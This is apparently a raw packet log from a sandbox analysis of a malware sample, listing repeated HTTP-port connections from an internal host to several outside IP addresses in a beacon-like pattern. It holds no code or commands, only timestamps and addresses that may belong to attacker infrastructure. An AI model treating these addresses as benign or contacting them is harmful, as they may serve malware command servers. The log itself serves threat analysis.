                                                                                                                      Nov 1, 2024 09:19:18.616914034 CET6291680192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:18.621898890 CET806291638.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:19.591402054 CET806291638.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:19.710329056 CET6291680192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:19.799519062 CET806291638.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:19.799567938 CET6291680192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:20.115910053 CET6291680192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:21.263226032 CET6291780192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:21.268105984 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.268292904 CET6291780192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:21.343086004 CET6291780192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:21.348035097 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.348054886 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.348072052 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.348079920 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.348088980 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.348098993 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.348216057 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.348232031 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:21.348252058 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:22.270983934 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:22.334592104 CET6291780192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:22.477252960 CET806291738.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:22.477363110 CET6291780192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:22.850294113 CET6291780192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:23.876532078 CET6291880192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:23.881380081 CET806291838.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:23.881484032 CET6291880192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:23.900376081 CET6291880192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:23.905195951 CET806291838.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:24.847829103 CET806291838.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:25.032977104 CET806291838.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:25.033195972 CET6291880192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:25.034111023 CET6291880192.168.2.438.47.232.160
                                                                                                                      Nov 1, 2024 09:19:25.039031982 CET806291838.47.232.160192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:31.543005943 CET6291980192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:31.547830105 CET806291934.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:31.547905922 CET6291980192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:31.561894894 CET6291980192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:31.566771984 CET806291934.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:32.502451897 CET806291934.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:32.600217104 CET6291980192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:32.682605982 CET806291934.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:32.682686090 CET6291980192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:33.069350958 CET6291980192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:34.088073015 CET6292080192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:34.093000889 CET806292034.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:34.093099117 CET6292080192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:34.106338024 CET6292080192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:34.111258030 CET806292034.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:35.070667028 CET806292034.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:35.240844965 CET6292080192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:35.246803999 CET806292034.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:35.248951912 CET6292080192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:35.616111994 CET6292080192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:36.634793043 CET6292180192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:36.639648914 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.639913082 CET6292180192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:36.650254011 CET6292180192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:36.655131102 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.655157089 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.655213118 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.655225039 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.655252934 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.655276060 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.655353069 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.655364990 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:36.655410051 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:37.584239960 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:37.693970919 CET6292180192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:37.764542103 CET806292134.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:37.764599085 CET6292180192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:38.162842035 CET6292180192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:39.198966980 CET6292280192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:39.204051018 CET806292234.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:39.204207897 CET6292280192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:39.213932991 CET6292280192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:39.218879938 CET806292234.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:40.158385038 CET806292234.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:40.303370953 CET6292280192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:40.339020014 CET806292234.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:40.339144945 CET6292280192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:40.340118885 CET6292280192.168.2.434.92.109.131
                                                                                                                      Nov 1, 2024 09:19:40.345549107 CET806292234.92.109.131192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:45.369652987 CET6292380192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:45.374624968 CET8062923162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:45.375051022 CET6292380192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:45.385766029 CET6292380192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:45.390661955 CET8062923162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:46.091547012 CET8062923162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:46.130311012 CET8062923162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:46.130369902 CET6292380192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:46.900933981 CET6292380192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:47.969825029 CET6292480192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:47.974693060 CET8062924162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:47.974760056 CET6292480192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:48.028384924 CET6292480192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:48.033195019 CET8062924162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:48.652123928 CET8062924162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:48.690802097 CET8062924162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:48.691019058 CET6292480192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:49.538042068 CET6292480192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:50.583034039 CET6292580192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:50.587934971 CET8062925162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:50.592938900 CET6292580192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:50.632992983 CET6292580192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:50.638575077 CET8062925162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:50.638592958 CET8062925162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:50.638685942 CET8062925162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:50.638699055 CET8062925162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:50.638711929 CET8062925162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:50.638724089 CET8062925162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:50.638974905 CET8062925162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:50.638998032 CET8062925162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:50.639010906 CET8062925162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:51.281482935 CET8062925162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:51.320941925 CET8062925162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:51.325066090 CET6292580192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:52.147173882 CET6292580192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:53.166152000 CET6292680192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:53.171053886 CET8062926162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:53.171160936 CET6292680192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:53.180800915 CET6292680192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:53.185607910 CET8062926162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:53.849731922 CET8062926162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:53.887752056 CET8062926162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:53.887831926 CET6292680192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:53.888806105 CET6292680192.168.2.4162.0.211.143
                                                                                                                      Nov 1, 2024 09:19:53.893563032 CET8062926162.0.211.143192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:58.970978022 CET6292780192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:19:58.975847960 CET8062927195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:58.975995064 CET6292780192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:19:58.987238884 CET6292780192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:19:58.992187977 CET8062927195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:59.824979067 CET8062927195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:59.940855980 CET6292780192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:19:59.949419022 CET8062927195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:19:59.949471951 CET6292780192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:00.490931988 CET6292780192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:01.561789989 CET6292880192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:01.567133904 CET8062928195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:01.567281008 CET6292880192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:01.658086061 CET6292880192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:01.662926912 CET8062928195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:02.418484926 CET8062928195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:02.478341103 CET6292880192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:02.541704893 CET8062928195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:02.541807890 CET6292880192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:03.178538084 CET6292880192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:04.196974039 CET6292980192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:04.201997995 CET8062929195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:04.202116966 CET6292980192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:04.213329077 CET6292980192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:04.218215942 CET8062929195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:04.218250036 CET8062929195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:04.218285084 CET8062929195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:04.218333006 CET8062929195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:04.218374014 CET8062929195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:04.218512058 CET8062929195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:04.218539953 CET8062929195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:04.218589067 CET8062929195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:04.218633890 CET8062929195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:05.035243988 CET8062929195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:05.087084055 CET6292980192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:05.159399986 CET8062929195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:05.163110018 CET6292980192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:05.725303888 CET6292980192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:06.744092941 CET6293080192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:06.749211073 CET8062930195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:06.751177073 CET6293080192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:06.757955074 CET6293080192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:06.762849092 CET8062930195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:07.625102997 CET8062930195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:07.678370953 CET6293080192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:07.749685049 CET8062930195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:07.749814987 CET6293080192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:07.750803947 CET6293080192.168.2.4195.110.124.133
                                                                                                                      Nov 1, 2024 09:20:07.755711079 CET8062930195.110.124.133192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:12.844080925 CET6293180192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:12.849055052 CET8062931185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:12.849180937 CET6293180192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:12.864849091 CET6293180192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:12.869909048 CET8062931185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:13.732875109 CET8062931185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:13.788073063 CET6293180192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:13.878237009 CET8062931185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:13.878308058 CET6293180192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:14.366015911 CET6293180192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:15.384421110 CET6293280192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:15.389580965 CET8062932185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:15.393069983 CET6293280192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:15.403769016 CET6293280192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:15.408678055 CET8062932185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:16.307127953 CET8062932185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:16.409533978 CET6293280192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:16.462754965 CET8062932185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:16.462831974 CET6293280192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:16.912962914 CET6293280192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:17.932531118 CET6293380192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:17.937581062 CET8062933185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:17.937668085 CET6293380192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:17.950933933 CET6293380192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:17.955775023 CET8062933185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:17.955846071 CET8062933185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:17.955878973 CET8062933185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:17.955929995 CET8062933185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:17.955960035 CET8062933185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:17.955991983 CET8062933185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:17.956039906 CET8062933185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:17.956068993 CET8062933185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:17.956100941 CET8062933185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:18.820733070 CET8062933185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:18.868973017 CET6293380192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:18.973143101 CET8062933185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:18.977066040 CET6293380192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:19.459796906 CET6293380192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:20.478743076 CET6293480192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:20.483854055 CET8062934185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:20.483961105 CET6293480192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:20.491862059 CET6293480192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:20.496768951 CET8062934185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:21.367784977 CET8062934185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:21.367845058 CET8062934185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:21.367882967 CET8062934185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:21.368396044 CET8062934185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:21.368457079 CET8062934185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:21.368463993 CET6293480192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:21.368874073 CET8062934185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:21.368931055 CET6293480192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:21.374984980 CET6293480192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:21.511943102 CET8062934185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:21.515130997 CET6293480192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:21.519042015 CET6293480192.168.2.4185.68.16.94
                                                                                                                      Nov 1, 2024 09:20:21.523873091 CET8062934185.68.16.94192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:27.073445082 CET6293580192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:27.078421116 CET8062935163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:27.078512907 CET6293580192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:27.093945980 CET6293580192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:27.098893881 CET8062935163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:27.968399048 CET8062935163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:27.968461037 CET8062935163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:27.968512058 CET6293580192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:28.112106085 CET8062935163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:28.112179995 CET6293580192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:28.600409985 CET6293580192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:29.618881941 CET6293680192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:29.623970032 CET8062936163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:29.624108076 CET6293680192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:29.635776043 CET6293680192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:29.640671015 CET8062936163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:30.492352009 CET8062936163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:30.492405891 CET8062936163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:30.492451906 CET6293680192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:30.630141973 CET8062936163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:30.630209923 CET6293680192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:31.154942036 CET6293680192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:32.166356087 CET6293780192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:32.171545982 CET8062937163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:32.171619892 CET6293780192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:32.185702085 CET6293780192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:32.190793991 CET8062937163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:32.190855026 CET8062937163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:32.190884113 CET8062937163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:32.190984011 CET8062937163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:32.191011906 CET8062937163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:32.191039085 CET8062937163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:32.191088915 CET8062937163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:32.191117048 CET8062937163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:32.191144943 CET8062937163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:33.033915997 CET8062937163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:33.034157038 CET6293780192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:33.694169044 CET6293780192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:33.699304104 CET8062937163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:34.712547064 CET6293880192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:34.719147921 CET8062938163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:34.723263025 CET6293880192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:34.730084896 CET6293880192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:34.736615896 CET8062938163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:35.599164963 CET8062938163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:35.599276066 CET8062938163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:35.599498034 CET6293880192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:35.737529039 CET8062938163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:35.737634897 CET6293880192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:35.738507986 CET6293880192.168.2.4163.44.176.12
                                                                                                                      Nov 1, 2024 09:20:35.745183945 CET8062938163.44.176.12192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:40.828983068 CET6293980192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:40.833959103 CET8062939199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:40.834150076 CET6293980192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:40.844985962 CET6293980192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:40.849843979 CET8062939199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:41.499006033 CET8062939199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:41.499053001 CET8062939199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:41.499262094 CET6293980192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:41.530648947 CET8062939199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:41.530877113 CET6293980192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:42.350344896 CET6293980192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:43.368992090 CET6294080192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:43.376570940 CET8062940199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:43.376743078 CET6294080192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:43.388987064 CET6294080192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:43.393913984 CET8062940199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:44.002643108 CET8062940199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:44.002721071 CET8062940199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:44.002767086 CET8062940199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:44.002825975 CET6294080192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:44.004986048 CET6294080192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:44.899070024 CET6294080192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:45.946830034 CET6294180192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:45.951877117 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:45.951962948 CET6294180192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:45.985119104 CET6294180192.168.2.4199.59.243.227
                                                                                                                      Nov 1, 2024 09:20:45.990144968 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:45.990196943 CET8062941199.59.243.227192.168.2.4
                                                                                                                      Nov 1, 2024 09:20:45.990253925 CET8062941199.59.243.227192.168.2.4
